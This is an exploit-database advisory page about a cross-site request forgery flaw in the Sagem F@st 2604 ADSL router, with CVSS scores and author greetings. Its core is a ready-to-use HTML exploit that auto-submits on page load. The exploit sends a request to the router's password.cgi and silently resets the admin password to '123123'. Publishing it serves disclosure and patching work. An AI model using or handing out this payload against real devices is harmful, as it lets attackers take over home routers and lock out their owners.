Sagem FAST 2604 CSRF Vulnerability (ADSL Router)

2012-10-10 / 2012-10-11
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Sagem F@ST 2604 CSRF Vulnerability (ADSL Router) # Author: KinG Of PiraTeS # Facebook Page: www.facebook.com/cr4ck3d # E-mail: t5r@hotmail.com # Category:: webapps # Google Dork: NA # Vendor: http://www.sagem.com/index.php # Version: 253180972B May be Other Version are Affected # Tested on: [Windows 7 Edition Intgrale] #### ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h | # | * ------> KinG Of PiraTeS * The g0bl!n <-------- * | # | ------------------------------------------------- < | ### # 1)Introduction 2)Vulnerability Description 3)Exploit >> ---------------------------------------------------------------- 1)Introduction The Sagemcom F@st 2604 is a wireless ADSL2/2+ router with one RJ-11 WAN port and four 10/100Base-T LAN ports. 2)Vulnerability Description From SAGEM F@st 2604 U can change the default "Admin" password Or Any User Password which is listening on tcp/ip port 80 May be Other Version are Affected 3)Exploit <html> <body onload="javascript:document.forms[0].submit()"> <H2>Password successfully changed [CSRF Exploit change ADMIN password]</H2> <form method="POST" name="form0" action="http://192.168.1.254/password.cgi?sysPassword=123123"> </form> </body> </html> - 123123 is the New Password - #### Peace From Algeria #### =======**Algerians Hackers**========== # Greets To : Caddy-Dz & KedAns-Dz **All Algerians Hackers** , Kondamne , The-007 , Bensekran , Joker dz (exploit-id.com) , (1337day.com) , (h4ckforu.com) , (alboraaq.com) All My Friends: Ali Abdennadher ,Chaouki Keffois , Kader11000 , Br0x-dz , Hanixpo !-Bb0yH4cK3r_Dz-! , xConsoLe , S@xx0R , kalashinkov3 ,..others ==========================

References:

http://www.sagem.com/index.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top